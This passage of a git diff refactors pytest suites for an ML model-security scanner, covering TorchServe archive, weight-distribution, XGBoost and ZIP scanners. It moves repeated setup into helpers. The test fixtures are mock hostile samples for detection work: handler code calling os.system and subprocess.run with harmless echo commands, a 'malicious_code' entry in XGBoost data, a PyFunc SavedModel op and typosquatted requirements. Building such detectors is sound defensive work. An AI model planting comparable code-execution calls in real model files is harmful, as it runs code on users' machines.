("requirements_bare_userinfo_direct_url.mar"), + ("direct_url_install"), ) def test_scan_ignores_missing_index_url_value(tmp_path: Path) -> None: - manifest = {"model": {"handler": "handler.py", "serializedFile": "weights.bin"}} - mar_path = _create_mar_archive( - tmp_path, - manifest=manifest, - entries={ - "handler.py": b"def handle(data, context):\n return {'ok': True}\n", - "weights.bin": b"weights", - "requirements.txt": b"--index-url\nnumpy==1.26.4\n", - }, - filename="requirements_missing_index_value.mar", - ) - - result = TorchServeMarScanner().scan(str(mar_path)) - requirements_checks = _checks_named(result, "TorchServe Requirements Supply Chain Analysis") - - assert len(requirements_checks) == 1 - assert requirements_checks[0].status == CheckStatus.PASSED + _assert_clean_requirements(tmp_path, (b"--index-url\nnumpy==1.26.4\n"), ("requirements_missing_index_value.mar")) def test_scan_bounds_requirements_reads_to_dedicated_limit( @@ -5594,6 +4991,97 @@ def test_scan_only_analyzes_exact_requirements_txt_filename(tmp_path: Path) -> N def test_scan_detects_typo_package_with_inline_hash_comment(tmp_path: Path) -> None: + result = _scan_mar_requirements(tmp_path, b"numppy#comment\n", "requirements_typo_hash_comment.mar") + requirements_failures = _failed_checks(result, "TorchServe Requirements Supply Chain Analysis") + + assert len(requirements_failures) == 1 + assert any( + finding["reason"] == "typosquatting_pattern" for finding in requirements_failures[0].details.get("findings", []) + ) + + +def _assert_handler_dangerous_call(handler_source: bytes, dangerous_name: str) -> None: + risky_calls, parse_error = TorchServeMarScanner()._find_high_risk_calls(handler_source) + + assert parse_error is None + assert dangerous_name in risky_calls + + +def _assert_handler_without_system_call(handler_source: bytes) -> None: + risky_calls, parse_error = TorchServeMarScanner()._find_high_risk_calls(handler_source) + + assert parse_error is None + assert "os.system" not in risky_calls + + +def _assert_getattr_handler_execution(tmp_path: Path, source_bytes: bytes, filename: str) -> None: + manifest = {"model": {"handler": "handler.py", "serializedFile": "weights.bin"}} + mar_path = _create_mar_archive( + tmp_path, + manifest=manifest, + entries={ + "handler.py": source_bytes, + "weights.bin": b"weights", + }, + filename=filename, + ) + + result = TorchServeMarScanner().scan(str(mar_path)) + handler_failures = _failed_checks(result, "TorchServe Handler Static Analysis") + + assert len(handler_failures) == 1 + assert handler_failures[0].severity == IssueSeverity.CRITICAL + assert "os.system" in handler_failures[0].message + + +def _assert_editable_git_warning(tmp_path: Path, requirements: bytes, filename: str) -> None: + result = _scan_mar_requirements(tmp_path, requirements, filename) + requirements_failures = _failed_checks(result, "TorchServe Requirements Supply Chain Analysis") + + assert len(requirements_failures) == 1 + assert requirements_failures[0].severity == IssueSeverity.WARNING + reasons = {finding["reason"] for finding in requirements_failures[0].details.get("findings", [])} + assert "editable_install" in reasons + assert "git_install" in reasons + + +def _assert_inert_python_metadata(tmp_path: Path, source_bytes: bytes, filename: str) -> None: + manifest = {"model": {"handler": "handler.py", "serializedFile": "weights.bin"}} + mar_path = _create_mar_archive( + tmp_path, + manifest=manifest, + entries={ + "handler.py": b"import utils\n\ndef handle(data, context):\n return utils.transform(data)\n", + "utils.py": (source_bytes), + "weights.bin": b"weights", + }, + filename=filename, + ) + + result = TorchServeMarScanner().scan(str(mar_path)) + non_handler_failures = _failed_checks(result, "MAR Non-Handler Python Analysis") + assert non_handler_failures == [] + + +def _assert_safe_getattr_handler(tmp_path: Path, source_bytes: bytes, filename: str) -> None: + manifest = {"model": {"handler": "handler.py", "serializedFile": "weights.bin"}} + mar_path = _create_mar_archive( + tmp_path, + manifest=manifest, + entries={ + "handler.py": (source_bytes), + "weights.bin": b"weights", + }, + filename=filename, + ) + + result = TorchServeMarScanner().scan(str(mar_path)) + handler_failures = _failed_checks(result, "TorchServe Handler Static Analysis") + + assert handler_failures == [] + + +def _assert_external_requirements_warning(tmp_path: Path, requirements_line: str, filename: str, reason: str) -> None: manifest = {"model": {"handler": "handler.py", "serializedFile": "weights.bin"}} mar_path = _create_mar_archive( tmp_path, @@ -5601,15 +5089,71 @@ def test_scan_detects_typo_package_with_inline_hash_comment(tmp_path: Path) -> N entries={ "handler.py": b"def handle(data, context):\n return {'ok': True}\n", "weights.bin": b"weights", - "requirements.txt": b"numppy#comment\n", + "requirements.txt": requirements_line.encode("utf-8"), }, - filename="requirements_typo_hash_comment.mar", + filename=filename, ) result = TorchServeMarScanner().scan(str(mar_path)) requirements_failures = _failed_checks(result, "TorchServe Requirements Supply Chain Analysis") assert len(requirements_failures) == 1 + assert requirements_failures[0].severity == IssueSeverity.WARNING + assert any(finding["reason"] == reason for finding in requirements_failures[0].details.get("findings", [])) + + +def _assert_warning_requirements(tmp_path: Path, requirements: bytes, filename: str, reason: str) -> None: + result = _scan_mar_requirements(tmp_path, requirements, filename) + requirements_failures = _failed_checks(result, "TorchServe Requirements Supply Chain Analysis") + + assert len(requirements_failures) == 1 + assert requirements_failures[0].severity == IssueSeverity.WARNING + assert any(finding["reason"] == reason for finding in requirements_failures[0].details.get("findings", [])) + + +def _assert_critical_requirements(tmp_path: Path, requirements: bytes, filename: str) -> None: + result = _scan_mar_requirements(tmp_path, requirements, filename) + requirements_failures = _failed_checks(result, "TorchServe Requirements Supply Chain Analysis") + + assert len(requirements_failures) == 1 + assert requirements_failures[0].severity == IssueSeverity.CRITICAL assert any( - finding["reason"] == "typosquatting_pattern" for finding in requirements_failures[0].details.get("findings", []) + finding["reason"] == "non_pypi_index_url" for finding in requirements_failures[0].details.get("findings", []) + ) + + +def _assert_clean_requirements(tmp_path: Path, requirements: bytes, filename: str) -> None: + result = _scan_mar_requirements(tmp_path, requirements, filename) + requirements_checks = _checks_named(result, "TorchServe Requirements Supply Chain Analysis") + + assert len(requirements_checks) == 1 + assert requirements_checks[0].status == CheckStatus.PASSED + + +def _scan_mar_requirements(tmp_path: Path, requirements: bytes, filename: str) -> ScanResult: + manifest = {"model": {"handler": "handler.py", "serializedFile": "weights.bin"}} + mar_path = _create_mar_archive( + tmp_path, + manifest=manifest, + entries={ + "handler.py": b"def handle(data, context):\n return {'ok': True}\n", + "weights.bin": b"weights", + "requirements.txt": requirements, + }, + filename=filename, ) + result = TorchServeMarScanner().scan(str(mar_path)) + return result + + +def _install_member_read_failure(monkeypatch: pytest.MonkeyPatch, filename: str) -> None: + original_read_member_bounded = TorchServeMarScanner._read_member_bounded + + def read_with_failure( + self: TorchServeMarScanner, archive: zipfile.ZipFile, member_info: zipfile.ZipInfo, max_bytes: int + ) -> bytes: + if member_info.filename == filename: + raise RuntimeError("CRC mismatch") + return original_read_member_bounded(self, archive, member_info, max_bytes) + + monkeypatch.setattr(TorchServeMarScanner, "_read_member_bounded", read_with_failure) diff --git a/tests/scanners/test_weight_distribution_scanner.py b/tests/scanners/test_weight_distribution_scanner.py index 4dc186d9d..a806cdc5e 100644 --- a/tests/scanners/test_weight_distribution_scanner.py +++ b/tests/scanners/test_weight_distribution_scanner.py @@ -7,7 +7,7 @@ import zipfile from functools import lru_cache from pathlib import Path -from typing import Any, Literal +from typing import Any import pytest @@ -19,6 +19,43 @@ from modelaudit.scanners.weight_distribution_scanner import WeightDistributionScanner from modelaudit.utils.tensorflow_compat import DataType, tensor_proto_to_ndarray from tests.helpers import create_mock_pytorch_zip +from tests.helpers.frameworks import has_tensorflow_runtime as has_tensorflow +from tests.helpers.scanners import install_zip_open_failure + + +class _RecordingAnyTorchLoad: + def __init__(self) -> None: + self.called = False + + def __call__(self, *_args: object, **_kwargs: object) -> dict[str, object]: + self.called = True + return {} + + +class _RecordingTorchLoad: + def __init__(self) -> None: + self.called = False + + def __call__( + self, + _path: str, + *, + map_location: object, + weights_only: bool = False, + ) -> dict[str, object]: + del map_location, weights_only + self.called = True + return {} + + +def fail_load( + _path: str, + *, + map_location: object, + weights_only: bool = False, +) -> object: + del map_location, weights_only + raise RuntimeError("force restricted fallback") def _make_mock_tensor_proto( @@ -196,16 +233,6 @@ def has_h5py(): return False -def has_tensorflow(): - try: - import tensorflow as tf - - # Vendored protobuf stubs are not sufficient for weight-distribution tests. - return bool(getattr(tf, "__version__", None)) and hasattr(tf, "constant") - except Exception: - return False - - # Use dynamic checks instead of module-level imports # Defer expensive checks to avoid module-level heavy imports HAS_NUMPY = has_numpy() # numpy is lightweight @@ -489,11 +516,7 @@ def test_hdf5_unrelated_external_link_does_not_make_weight_analysis_incomplete(t metadata = hdf5_file.create_group("metadata") metadata["asset"] = h5py.ExternalLink("missing-assets.h5", "/asset") - scanner = WeightDistributionScanner() - weights = scanner._extract_keras_weights(str(path)) - - assert list(weights) == ["model_weights/dense/kernel:0"] - assert scanner.extraction_incomplete is False + _assert_keras_weight_names(path, ["model_weights/dense/kernel:0"]) @pytest.mark.skipif(not HAS_NUMPY or not has_h5py(), reason="numpy and h5py required") @@ -506,11 +529,7 @@ def test_hdf5_internal_soft_link_is_resolved(tmp_path: Path) -> None: hdf5_file.create_dataset("storage/dense_values", data=np.ones((2, 2), dtype=np.float32)) hdf5_file["model_weights/dense/kernel:0"] = h5py.SoftLink("/storage/dense_values") - scanner = WeightDistributionScanner() - weights = scanner._extract_keras_weights(str(path)) - - assert list(weights) == ["model_weights/dense/kernel:0"] - assert scanner.extraction_incomplete is False + _assert_keras_weight_names(path, ["model_weights/dense/kernel:0"]) @pytest.mark.skipif(not HAS_NUMPY or not has_h5py(), reason="numpy and h5py required") @@ -523,11 +542,7 @@ def test_hdf5_group_soft_link_preserves_weight_alias_path(tmp_path: Path) -> Non hdf5_file.create_dataset("z_storage/dense_values", data=np.ones((2, 2), dtype=np.float32)) hdf5_file["a_model_weights"] = h5py.SoftLink("/z_storage") - scanner = WeightDistributionScanner() - weights = scanner._extract_keras_weights(str(path)) - - assert list(weights) == ["a_model_weights/dense_values"] - assert scanner.extraction_incomplete is False + _assert_keras_weight_names(path, ["a_model_weights/dense_values"]) @pytest.mark.skipif(not HAS_NUMPY or not has_h5py(), reason="numpy and h5py required") @@ -635,18 +650,7 @@ class FakeTensor: fake_torch.Tensor = FakeTensor fake_torch.device = lambda value: value - load_called = False - - def fake_load( - _path: str, - *, - map_location: object, - weights_only: bool = False, - ) -> dict[str, object]: - del map_location, weights_only - nonlocal load_called - load_called = True - return {} + fake_load = _RecordingTorchLoad() fake_torch.load = fake_load monkeypatch.setitem(sys.modules, "torch", fake_torch) @@ -666,7 +670,7 @@ def fake_load( weights = scanner._extract_pytorch_weights(str(path)) assert weights == {} - assert load_called is False + assert fake_load.called is False assert scanner.extraction_incomplete_reasons == ["pytorch_load_size_limit"] @@ -725,18 +729,7 @@ class FakeTensor: fake_torch.Tensor = FakeTensor fake_torch.device = lambda value: value - load_called = False - - def fake_load( - _path: str, - *, - map_location: object, - weights_only: bool = False, - ) -> dict[str, object]: - del map_location, weights_only - nonlocal load_called - load_called = True - return {} + fake_load = _RecordingTorchLoad() fake_torch.load = fake_load monkeypatch.setitem(sys.modules, "torch", fake_torch) @@ -757,7 +750,7 @@ def fake_load( weights = scanner._extract_pytorch_weights(str(path)) assert weights == {} - assert load_called is True + assert fake_load.called is True assert scanner.extraction_incomplete is False @@ -828,20 +821,13 @@ def fake_load( original_open = zipfile.ZipFile.open - def fail_if_data_pkl_is_opened( - archive: zipfile.ZipFile, - name: str | zipfile.ZipInfo, - mode: Literal["r", "w"] = "r", - pwd: bytes | None = None, - *, - force_zip64: bool = False, - ) -> Any: - member_name = name.filename if isinstance(name, zipfile.ZipInfo) else name - if member_name == "data.pkl": - raise AssertionError("over-budget data.pkl should not be opened") - return original_open(archive, name, mode=mode, pwd=pwd, force_zip64=force_zip64) - - monkeypatch.setattr(zipfile.ZipFile, "open", fail_if_data_pkl_is_opened) + install_zip_open_failure( + monkeypatch, + original_open, + lambda name: (name.filename if isinstance(name, zipfile.ZipInfo) else name) == "data.pkl", + lambda: AssertionError("over-budget data.pkl should not be opened"), + positional_mode=False, + ) scanner = WeightDistributionScanner({"max_array_size": 1024, "max_weight_distribution_total_bytes": 32}) weights = scanner._extract_pytorch_weights(str(path)) @@ -983,15 +969,6 @@ class FakeTensor: fake_torch.Tensor = FakeTensor fake_torch.device = lambda value: value - def fail_load( - _path: str, - *, - map_location: object, - weights_only: bool = False, - ) -> object: - del map_location, weights_only - raise RuntimeError("force restricted fallback") - fake_torch.load = fail_load monkeypatch.setitem(sys.modules, "torch", fake_torch) @@ -1148,15 +1125,6 @@ class FakeTensor: fake_torch.Tensor = FakeTensor fake_torch.device = lambda value: value - def fail_load( - _path: str, - *, - map_location: object, - weights_only: bool = False, - ) -> object: - del map_location, weights_only - raise RuntimeError("force restricted fallback") - fake_torch.load = fail_load monkeypatch.setitem(sys.modules, "torch", fake_torch) @@ -1189,15 +1157,6 @@ class FakeTensor: fake_torch.Tensor = FakeTensor fake_torch.device = lambda value: value - def fail_load( - _path: str, - *, - map_location: object, - weights_only: bool = False, - ) -> object: - del map_location, weights_only - raise RuntimeError("force restricted fallback") - fake_torch.load = fail_load monkeypatch.setitem(sys.modules, "torch", fake_torch) @@ -1698,40 +1657,10 @@ def test_extreme_value_check_detects_small_binary_head_with_contaminated_thresho assert extreme["details"]["per_output_evidence"][0]["detection_path"] == "robust_small_tensor_fallback" def test_extreme_value_check_ignores_nonqualifying_decoy_output(self) -> None: - import numpy as np - - scanner = WeightDistributionScanner() - weights = np.zeros((100, 10), dtype=np.float32) - weights[50:55, 3] = 10.0 - weights[0, 4] = 3.0 - - anomalies = scanner._analyze_layer_weights( - "decoy_output", - weights, - self._create_mock_architecture_analysis(is_llm=False), - ) - - extreme = next(anomaly for anomaly in anomalies if "extremely large weight values" in anomaly["description"]) - assert extreme["details"]["affected_neurons"] == [3] - assert extreme["details"]["num_extreme_weights"] == 5 + self._assert_extreme_value_with_decoy((3.0), ("decoy_output"), ("num_extreme_weights"), (5)) def test_extreme_value_check_detects_target_despite_larger_decoy_output(self) -> None: - import numpy as np - - scanner = WeightDistributionScanner() - weights = np.zeros((100, 10), dtype=np.float32) - weights[50:55, 3] = 10.0 - weights[0, 4] = 1_000_000.0 - - anomalies = scanner._analyze_layer_weights( - "large_decoy_output", - weights, - self._create_mock_architecture_analysis(is_llm=False), - ) - - extreme = next(anomaly for anomaly in anomalies if "extremely large weight values" in anomaly["description"]) - assert extreme["details"]["affected_neurons"] == [3] - assert extreme["details"]["total_affected"] == 1 + self._assert_extreme_value_with_decoy((1_000_000.0), ("large_decoy_output"), ("total_affected"), (1)) def test_extreme_value_check_detects_target_despite_two_value_decoy_output(self) -> None: import numpy as np @@ -2071,16 +2000,7 @@ def test_tensor_extreme_analysis_bounds_temporary_chunks(self, monkeypatch: pyte scanner = WeightDistributionScanner() weights = np.zeros((1024, 4096), dtype=np.float32) weights[:5, 3] = 1_000_000.0 - original_absolute = np.absolute - work_buffer_sizes: list[int] = [] - - def tracked_absolute(value: Any, *args: Any, **kwargs: Any) -> Any: - output = kwargs.get("out") - if output is not None: - work_buffer_sizes.append(int(getattr(output, "nbytes", 0))) - return original_absolute(value, *args, **kwargs) - - monkeypatch.setattr(np, "absolute", tracked_absolute) + work_buffer_sizes = _track_absolute_work_buffers(monkeypatch, np) anomalies = scanner._analyze_tensor_weight_extremes("large_tensor", weights, output_axes=(1,)) assert any("extremely large weight values" in anomaly["description"] for anomaly in anomalies) @@ -2092,16 +2012,7 @@ def test_tensor_extreme_analysis_chunks_single_wide_output(self, monkeypatch: py scanner = WeightDistributionScanner() weights = np.zeros((1_100_000, 1), dtype=np.float32) weights[:5, 0] = 1_000_000.0 - original_absolute = np.absolute - work_buffer_sizes: list[int] = [] - - def tracked_absolute(value: Any, *args: Any, **kwargs: Any) -> Any: - output = kwargs.get("out") - if output is not None: - work_buffer_sizes.append(int(getattr(output, "nbytes", 0))) - return original_absolute(value, *args, **kwargs) - - monkeypatch.setattr(np, "absolute", tracked_absolute) + work_buffer_sizes = _track_absolute_work_buffers(monkeypatch, np) anomalies = scanner._analyze_tensor_weight_extremes("wide_output", weights, output_axes=(1,)) assert any("extremely large weight values" in anomaly["description"] for anomaly in anomalies) @@ -2247,24 +2158,20 @@ def test_pytorch_zip_data_pkl_safe_extraction( tmp_path: Path, ) -> None: """Ensure safe pickle in PyTorch ZIP can be parsed without code execution""" - load_called = False data = {"layer.weight": [[1.0, 2.0], [3.0, 4.0]]} data_bytes = pickle.dumps(data, protocol=4) zip_path = tmp_path / "model.pt" with zipfile.ZipFile(zip_path, "w") as z: z.writestr("data.pkl", data_bytes) - def fake_load(*_args: object, **_kwargs: object) -> dict[str, object]: - nonlocal load_called - load_called = True - return {} + fake_load = _RecordingAnyTorchLoad() _install_fake_torch(monkeypatch, fake_load) scanner = WeightDistributionScanner() weights = scanner._extract_pytorch_weights(str(zip_path)) assert not scanner.extraction_unsafe assert not scanner.extraction_incomplete - assert load_called is False + assert fake_load.called is False assert "layer.weight" in weights assert weights["layer.weight"].shape == (2, 2) @@ -2294,20 +2201,13 @@ def fail_load(*_args: object, **_kwargs: object) -> object: original_open = zipfile.ZipFile.open - def fail_if_data_pkl_is_opened( - archive: zipfile.ZipFile, - name: str | zipfile.ZipInfo, - mode: Literal["r", "w"] = "r", - pwd: bytes | None = None, - *, - force_zip64: bool = False, - ) -> Any: - member_name = name.filename if isinstance(name, zipfile.ZipInfo) else name - if member_name == "data.pkl": - raise AssertionError("oversized data.pkl should not be opened") - return original_open(archive, name, mode=mode, pwd=pwd, force_zip64=force_zip64) - - monkeypatch.setattr(zipfile.ZipFile, "open", fail_if_data_pkl_is_opened) + install_zip_open_failure( + monkeypatch, + original_open, + lambda name: (name.filename if isinstance(name, zipfile.ZipInfo) else name) == "data.pkl", + lambda: AssertionError("oversized data.pkl should not be opened"), + positional_mode=False, + ) scanner = WeightDistributionScanner({"max_array_size": 1}) weights = scanner._extract_pytorch_weights(str(zip_path)) @@ -3053,12 +2953,7 @@ def test_blocks_torch_load_without_explicit_opt_in( tmp_path: Path, torch_version: str, ) -> None: - load_called = False - - def fake_load(*_args: object, **_kwargs: object) -> dict[str, object]: - nonlocal load_called - load_called = True - return {} + fake_load = _RecordingAnyTorchLoad() _install_fake_torch(monkeypatch, fake_load, version=torch_version) model_path = tmp_path / "blocked.pt" @@ -3072,7 +2967,7 @@ def fake_load(*_args: object, **_kwargs: object) -> dict[str, object]: assert scanner.extraction_unsafe_reason is not None assert "Blocked torch.load" in scanner.extraction_unsafe_reason assert "not a trust boundary" in scanner.extraction_unsafe_reason - assert load_called is False + assert fake_load.called is False @pytest.mark.parametrize("unsafe_value", [1, "true", "false", {"enabled": True}]) def test_torch_load_opt_in_requires_literal_true( @@ -3081,12 +2976,7 @@ def test_torch_load_opt_in_requires_literal_true( tmp_path: Path, unsafe_value: Any, ) -> None: - load_called = False - - def fake_load(*_args: object, **_kwargs: object) -> dict[str, object]: - nonlocal load_called - load_called = True - return {} + fake_load = _RecordingAnyTorchLoad() _install_fake_torch(monkeypatch, fake_load) model_path = tmp_path / "strict-opt-in.pt" @@ -3097,7 +2987,7 @@ def fake_load(*_args: object, **_kwargs: object) -> dict[str, object]: assert weights == {} assert scanner.extraction_unsafe - assert load_called is False + assert fake_load.called is False def test_explicit_torch_load_opt_in_retains_weights_only( self, @@ -3149,12 +3039,7 @@ def test_blocked_torch_load_is_inconclusive_and_not_cached( monkeypatch: pytest.MonkeyPatch, tmp_path: Path, ) -> None: - load_called = False - - def fake_load(*_args: object, **_kwargs: object) -> dict[str, object]: - nonlocal load_called - load_called = True - return {} + fake_load = _RecordingAnyTorchLoad() _install_fake_torch(monkeypatch, fake_load) model_path = create_mock_pytorch_zip(tmp_path / "blocked.pt", with_pickle=False) @@ -3170,7 +3055,7 @@ def fake_load(*_args: object, **_kwargs: object) -> dict[str, object]: assert analysis_check.details["extraction_incomplete_reasons"] == ["unsafe_pytorch_weight_extraction"] assert "not a trust boundary" in analysis_check.details["unsafe_reason"] assert not any(check.severity in {IssueSeverity.WARNING, IssueSeverity.CRITICAL} for check in direct.checks) - assert load_called is False + assert fake_load.called is False cache_dir = tmp_path / "cache" reset_cache_manager() @@ -3201,6 +3086,48 @@ def fake_load(*_args: object, **_kwargs: object) -> dict[str, object]: ) assert all(issue.rule_code != "S801" for issue in aggregate.issues) assert get_cache_manager(str(cache_dir), enabled=True).get_stats()["total_entries"] == 0 - assert load_called is False + assert fake_load.called is False finally: reset_cache_manager() + + def _assert_extreme_value_with_decoy( + self, decoy_weight: float, layer_name: str, detail_key: str, expected_count: int + ) -> None: + import numpy as np + + scanner = WeightDistributionScanner() + weights = np.zeros((100, 10), dtype=np.float32) + weights[50:55, 3] = 10.0 + weights[0, 4] = decoy_weight + + anomalies = scanner._analyze_layer_weights( + layer_name, + weights, + self._create_mock_architecture_analysis(is_llm=False), + ) + + extreme = next(anomaly for anomaly in anomalies if "extremely large weight values" in anomaly["description"]) + assert extreme["details"]["affected_neurons"] == [3] + assert extreme["details"][detail_key] == expected_count + + +def _track_absolute_work_buffers(monkeypatch: pytest.MonkeyPatch, np: Any) -> list[int]: + original_absolute = np.absolute + work_buffer_sizes: list[int] = [] + + def tracked_absolute(value: Any, *args: Any, **kwargs: Any) -> Any: + output = kwargs.get("out") + if output is not None: + work_buffer_sizes.append(int(getattr(output, "nbytes", 0))) + return original_absolute(value, *args, **kwargs) + + monkeypatch.setattr(np, "absolute", tracked_absolute) + return work_buffer_sizes + + +def _assert_keras_weight_names(path: Path, expected_names: list[str]) -> None: + scanner = WeightDistributionScanner() + weights = scanner._extract_keras_weights(str(path)) + + assert list(weights) == expected_names + assert scanner.extraction_incomplete is False diff --git a/tests/scanners/test_xgboost_scanner.py b/tests/scanners/test_xgboost_scanner.py index fc3a0d740..87d82981c 100644 --- a/tests/scanners/test_xgboost_scanner.py +++ b/tests/scanners/test_xgboost_scanner.py @@ -44,6 +44,28 @@ ) from modelaudit.utils.helpers.file_iterator import iterate_files_streaming from tests.cli_output import parse_click_json_output +from tests.helpers.file_creators import ( + _encode_protobuf_varint as _proto_varint, +) +from tests.helpers.file_creators import ( + ubjson_key as _ubjson_key, +) +from tests.helpers.file_creators import ( + ubjson_string as _ubjson_string, +) +from tests.helpers.file_creators import ( + xgboost_ubjson_counted_null_array_probe as _xgboost_ubjson_counted_null_array_probe, +) +from tests.helpers.file_creators import ( + xgboost_ubjson_noop_before_counted_root_header_probe as _xgboost_ubjson_noop_before_counted_root_header_probe, +) +from tests.helpers.file_creators import ( + xgboost_ubjson_probe as _xgboost_ubjson_probe, +) +from tests.helpers.file_creators import ( + xgboost_ubjson_uncounted_null_array_probe as _xgboost_ubjson_uncounted_null_array_probe, +) +from tests.helpers.text import LowerCountingText class FakeBooster: @@ -65,15 +87,6 @@ def _headerless_legacy_binary_header() -> bytes: return struct.pack(" bytes: - encoded = bytearray() - while value >= 0x80: - encoded.append((value & 0x7F) | 0x80) - value >>= 7 - encoded.append(value) - return bytes(encoded) - - def _proto_field(field_number: int, wire_type: int, payload: bytes) -> bytes: return _proto_varint((field_number << 3) | wire_type) + payload @@ -422,36 +435,6 @@ def _assert_xgboost_s1004(result: ModelAuditResultModel) -> None: assert any(issue.rule_code == "S1004" for issue in result.issues) -def _ubjson_key(key: bytes) -> bytes: - return b"U" + bytes([len(key)]) + key - - -def _ubjson_string(value: bytes) -> bytes: - return b"SL" + len(value).to_bytes(8, byteorder="big", signed=True) + value - - -def _xgboost_ubjson_probe( - *, root_padding: int = 0, learner_padding: int = 0, learner_noop: bool = False, malicious: bool = False -) -> bytes: - root_body = b"" - if root_padding: - root_body += _ubjson_key(b"metadata") + _ubjson_string(b"x" * root_padding) - learner_body = b"" - if learner_padding: - learner_body += _ubjson_key(b"metadata") + _ubjson_string(b"x" * learner_padding) - learner_body += _ubjson_key(b"learner_model_param") + b"{}" - if malicious: - learner_body += _ubjson_key(b"malicious_code") + _ubjson_string(b"system(cpu)") - learner_value = (b"N" if learner_noop else b"") + b"{" + learner_body + b"}" - return b"{" + root_body + _ubjson_key(b"learner") + learner_value + _ubjson_key(b"version") + b"[]" + b"}" - - -def _xgboost_ubjson_counted_null_array_probe() -> bytes: - max_count = ((1 << 63) - 1).to_bytes(8, byteorder="big", signed=True) - learner = b"{" + _ubjson_key(b"learner_model_param") + b"{}" + _ubjson_key(b"payload") + b"[$Z#L" + max_count + b"}" - return b"{" + _ubjson_key(b"learner") + learner + _ubjson_key(b"version") + b"[]" + b"}" - - def _xgboost_ubjson_counted_null_array_before_learner_probe() -> bytes: max_count = ((1 << 63) - 1).to_bytes(8, byteorder="big", signed=True) return ( @@ -485,32 +468,6 @@ def _xgboost_ubjson_noops_before_counted_null_array_probe() -> bytes: ) -def _xgboost_ubjson_uncounted_null_array_probe(item_count: int) -> bytes: - learner = ( - b"{" - + _ubjson_key(b"learner_model_param") - + b"{}" - + _ubjson_key(b"payload") - + b"[" - + (b"Z" * item_count) - + b"]}" - ) - return b"{" + _ubjson_key(b"learner") + learner + b"}" - - -def _xgboost_ubjson_noop_before_counted_root_header_probe() -> bytes: - return ( - b"{N#U\x02" - + _ubjson_key(b"learner") - + b"{" - + _ubjson_key(b"learner_model_param") - + b"{}" - + b"}" - + _ubjson_key(b"version") - + b"[]" - ) - - def _ubjson_root_counted_null_array_probe() -> bytes: max_count = ((1 << 63) - 1).to_bytes(8, byteorder="big", signed=True) return b"[$Z#L" + max_count @@ -1264,14 +1221,7 @@ class TestXGBoostBinaryScanning: """Test XGBoost binary model scanning.""" def test_legacy_header_pattern_search_reuses_lowered_header(self, xgboost_scanner: XGBoostScanner) -> None: - class CountingHeader(str): - lower_calls = 0 - - def lower(self) -> str: - self.lower_calls += 1 - return super().lower() - - header = CountingHeader("BINF GBTree REG:squarederror") + header = LowerCountingText("BINF GBTree REG:squarederror") assert xgboost_scanner._find_legacy_header_patterns(header) == ["gbtree", "reg:"] assert header.lower_calls == 1 diff --git a/tests/scanners/test_zip_scanner.py b/tests/scanners/test_zip_scanner.py index f03560055..8b0bcaced 100644 --- a/tests/scanners/test_zip_scanner.py +++ b/tests/scanners/test_zip_scanner.py @@ -19,7 +19,6 @@ import pytest from modelaudit import core -from modelaudit.analysis.unified_context import UnifiedMLContext from modelaudit.cache import get_cache_manager, reset_cache_manager from modelaudit.cache.optimized_config import build_cache_version_context from modelaudit.config import ModelAuditConfig, reset_config, set_config @@ -46,13 +45,27 @@ ) from modelaudit.utils.file import detection as file_detection from modelaudit.utils.tensorflow_compat import has_tensorflow_protobuf_stubs as _has_tf_protos -from modelaudit.whitelists import POPULAR_MODELS from tests.helpers import ( create_mock_mxnet_symbol, create_mock_onnx, prefix_mock_onnx_with_unknown_field, prefix_mock_onnx_with_unknown_group, ) +from tests.helpers.file_creators import ExecPayload, ReadTrackingBuffer, SystemCommandPayload +from tests.helpers.scanners import scan_nested_critical_finding as nested_scan +from tests.helpers.scanners import scan_nested_unsuccessful, scan_with_whitelisted_finding, without_keras_zip_scanner +from tests.helpers.tensorflow import build_tf_savedmodel + + +def _nested_scan_recorder(paths: list[str], *, finish: bool = True) -> Callable[[str, dict[str, Any]], ScanResult]: + def nested_scan(path: str, _config: dict[str, Any]) -> ScanResult: + paths.append(path) + result = ScanResult(scanner_name="test") + if finish: + result.finish(success=True) + return result + + return nested_scan def _npy_payload() -> bytes: @@ -175,18 +188,7 @@ def _build_malicious_tf_metagraph() -> bytes: def _build_malicious_tf_savedmodel() -> bytes: - if not _has_tf_protos(): - pytest.skip("TensorFlow protobuf stubs unavailable") - import modelaudit.protos # noqa: F401 - - saved_model_pb2 = importlib.import_module("tensorflow.core.protobuf.saved_model_pb2") - saved_model = saved_model_pb2.SavedModel() - saved_model.saved_model_schema_version = 1 - metagraph = saved_model.meta_graphs.add() - metagraph.meta_info_def.meta_graph_version = "owner" - node = metagraph.graph_def.node.add() - node.op = "PyFunc" - return cast(bytes, saved_model.SerializeToString()) + return build_tf_savedmodel(None, "PyFunc", "owner") def test_rewrite_extracted_member_location_preserves_scanner_specific_suffix_policy() -> None: @@ -252,150 +254,61 @@ def test_nested_dispatch_routes_compressed_header_aliases_to_compressed_scanner( def test_scan_zip_flags_dangerous_python_member(tmp_path: Path) -> None: - archive_path = tmp_path / "model_bundle.zip" - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", "import os\nos.system('echo hidden')\n") - - result = ZipScanner().scan(str(archive_path)) - - python_checks = [ - check - for check in result.checks - if check.name == "Python Archive Member Security" and check.status == CheckStatus.FAILED - ] - assert len(python_checks) == 1 - assert python_checks[0].severity == IssueSeverity.WARNING - assert python_checks[0].details["entry"] == "handler.py" + _assert_zip_python_member_warning(tmp_path, ("import os\nos.system('echo hidden')\n"), ("entry"), ("handler.py")) def test_scan_zip_flags_aliased_dangerous_python_member(tmp_path: Path) -> None: - archive_path = tmp_path / "model_bundle.zip" - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", "import subprocess as sp\nsp.run(['echo', 'hidden'], check=False)\n") - - result = ZipScanner().scan(str(archive_path)) - - python_checks = [ - check - for check in result.checks - if check.name == "Python Archive Member Security" and check.status == CheckStatus.FAILED - ] - assert len(python_checks) == 1 - assert python_checks[0].severity == IssueSeverity.WARNING - assert python_checks[0].details["reason"] == "high-risk calls: subprocess.run" + _assert_zip_python_member_warning( + tmp_path, + ("import subprocess as sp\nsp.run(['echo', 'hidden'], check=False)\n"), + ("reason"), + ("high-risk calls: subprocess.run"), + ) def test_scan_zip_flags_from_import_dangerous_python_member(tmp_path: Path) -> None: - archive_path = tmp_path / "model_bundle.zip" - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", "from subprocess import run\nrun('echo hidden', shell=True)\n") - - result = ZipScanner().scan(str(archive_path)) - - python_checks = [ - check - for check in result.checks - if check.name == "Python Archive Member Security" and check.status == CheckStatus.FAILED - ] - assert len(python_checks) == 1 - assert python_checks[0].severity == IssueSeverity.WARNING - assert 